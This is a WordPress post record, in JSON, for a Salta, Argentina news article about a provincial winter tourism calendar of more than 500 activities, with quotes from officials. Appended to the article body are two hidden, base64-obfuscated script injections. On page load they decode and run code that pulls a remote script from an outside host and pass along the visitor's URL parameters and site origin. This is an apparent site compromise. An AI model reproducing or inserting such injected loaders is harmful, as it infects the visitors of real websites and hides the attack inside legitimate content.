{"id":2827,"date":"2023-07-06T17:50:26","date_gmt":"2023-07-06T20:50:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2827"},"modified":"2025-08-14T00:13:18","modified_gmt":"2025-08-14T03:13:18","slug":"turistas-y-saltenos-podran-disfrutar-de-mas-de-500-actividades-de-invierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2827","title":{"rendered":"Turistas y salte\u00f1os podr\u00e1n disfrutar de m\u00e1s de 500 actividades de invierno"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a20551\">Hasta fines de julio son m\u00e1s de 500 las actividades culturales, gastron\u00f3micas, de naturaleza y aventura programadas en las siete regiones tur\u00edsticas. Se pueden conocer en https:\/\/www.saltacalendario.gob.ar\/<\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes present\u00f3 el Calendario Tur\u00edstico de Invierno con m\u00e1s de 500 actividades en los municipios de las siete regiones tur\u00edsticas de la Provincia; la secretaria de Turismo&nbsp;<strong>Nadia Loza<\/strong>&nbsp;agradeci\u00f3 &nbsp;a los municipios por el trabajo conjunto, al sector privado y destac\u00f3 que Salta ya super\u00f3 el mill\u00f3n de turistas.<\/p>\n\n\n\n<p>Las actividades que se podr\u00e1n disfrutar en las siete regiones salte\u00f1as permitir\u00e1n conocer las ferias, los festivales, la gastronom\u00eda, artesan\u00edas y acercarse a la religiosidad; asimismo, se puede acceder al turismo naturaleza y de aventura; importantes propuestas vivenciales que se pueden conocer en\u00a0<a href=\"https:\/\/www.saltacalendario.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/www.saltacalendario.gob.ar\/<\/a><\/p>\n\n\n\n<p>Por otra parte, Loza sostuvo: \u201cVenimos de mayo y junio que han sido hist\u00f3ricos, los mejores de la historia que vivimos en Salta, es gracias a este gran trabajo que se hace con el sector privado, con los municipios; y con el trabajo en materia de promoci\u00f3n a nivel nacional e nivel internacional\u201d.<\/p>\n\n\n\n<p>La funcionaria agreg\u00f3 que el Calendario consta de m\u00e1s de 500 actividades, diagramadas en colaboraci\u00f3n con la Secretar\u00eda de Cultura de la Provincia, en las 7 regiones tur\u00edsticas. \u201cSon actividades muy innovadoras que se suman a la oferta tradicional, es un calendario s\u00faper interesante para que todos podamos seguir descubriendo nuestra hermos\u00edsima Salta que como siempre decimos, es tan linda que enamora\u201d.<\/p>\n\n\n\n<p>Por su parte, el secretario de Cultura Diego Ashur Mas destac\u00f3 la labor mancomunada que se realiza para ofrecer lo mejor que tiene Salta: la calidez de su gente y la belleza de sus paisajes; \u201cestamos contentos de sumar a nuestra cultura que es la marca de nuestra identidad\u201d. Y sostuvo que el objetivo es siempre, como lo pide el Gobernador, que nuestra gente viva mejor.<\/p>\n\n\n\n<p>Estuvieron presentes el subsecretario de Desarrollo y Competitividad&nbsp;<strong>Alejandro Cha Usandivaras<\/strong>, la subsecretaria de Promoci\u00f3n Tur\u00edstica&nbsp;<strong>Laura Alcorta<\/strong>, la directora ejecutiva de Inprotur Salta&nbsp;<strong>Mar\u00eda Eugenia Cornejo<\/strong>, la directora general de Destinos Tur\u00edsticos&nbsp;<strong>Soledad Issa<\/strong>, &nbsp;la subsecretaria de Patrimonio Cultural&nbsp;<strong>Claudia Lamas<\/strong>, el director Museo Hist\u00f3rico del Norte&nbsp;<strong>Mario Lazarovich<\/strong>&nbsp;y el presidente de la C\u00e1mara de Turismo de Salta,&nbsp;<strong>Gustavo Di M\u00e9cola<\/strong>.&nbsp;<\/p>\n\n\n\n<p>Desde los municipios, asistieron el subsecretario de Cultura y Turismo de la Municipalidad de Salta<strong>&nbsp;Fernando Garc\u00eda Soria<\/strong>, la secretaria de Cultura y Turismo de la Municipalidad de San Lorenzo&nbsp;<strong>Ana Cornejo<\/strong>&nbsp;y el presidente de la C\u00e1mara de Turismo de Campo Quijano, adem\u00e1s de otros referentes tur\u00edsticos municipales.<\/p>\n\n\n\n<p><strong>Actividades<\/strong><\/p>\n\n\n\n<p>Los municipios organizaron diversas actividades entre las que se mencionan, seg\u00fan cada regi\u00f3n, las siguientes:<\/p>\n\n\n\n<p>Selva de Monta\u00f1a ofrece en Tartagal el Duatl\u00f3n Cross Virgen de la Pe\u00f1a 2023 que se realiza el domingo 9 de julio a partir de las 8 en Yariguarenda; es un desaf\u00edo deportivo de dos disciplinas: Mountain Bike + Running.<\/p>\n\n\n\n<p>Por otra parte en la regi\u00f3n Valle de Lerma, el mi\u00e9rcoles 12 a las 10 en la Cuesta del Obispo, Chicoana, se har\u00e1 la recepci\u00f3n al primer turista vacaciones de invierno. En la regi\u00f3n de Salta y destinos cercanos, San Lorenzo llevar\u00e1 a cabo, el viernes 21 a &nbsp;las 9:00 hs, un trekking guiado por la Reserva Las Yungas.<\/p>\n\n\n\n<p>San Carlos en los Valles Calchaqu\u00edes esperan para la visita a la Iglesia San Carlos Borromeo, &nbsp;la visita permitir\u00e1 conocer la historia y datos relevantes de la Iglesia del pueblo, Monumento Hist\u00f3rico Nacional. En Met\u00e1n, Valle Hist\u00f3rico y Gaucho, los ni\u00f1os y adultos podr\u00e1n disfrutar de la Caminata a Los Laureles, entre otros d\u00edas podr\u00e1 realizarse el s\u00e1bado 22 a las 10.00. En San Antonio de los Cobres (Puna de los Andes) se recibir\u00e1 el &nbsp;s\u00e1bado 8 a las 8:30 al Primer Turista.&nbsp;<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hasta fines de julio son m\u00e1s de 500 las actividades culturales, gastron\u00f3micas, de naturaleza y aventura programadas en las siete regiones tur\u00edsticas. Se pueden conocer en https:\/\/www.saltacalendario.gob.ar\/ El Ministerio de Turismo y Deportes present\u00f3 el Calendario Tur\u00edstico de Invierno con m\u00e1s de 500 actividades en los municipios de las siete regiones tur\u00edsticas de la Provincia; [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2828,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-2827","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2827"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2827"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2827\/revisions"}],"predecessor-version":[{"id":7033,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2827\/revisions\/7033"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2828"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2827"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2827"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2827"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}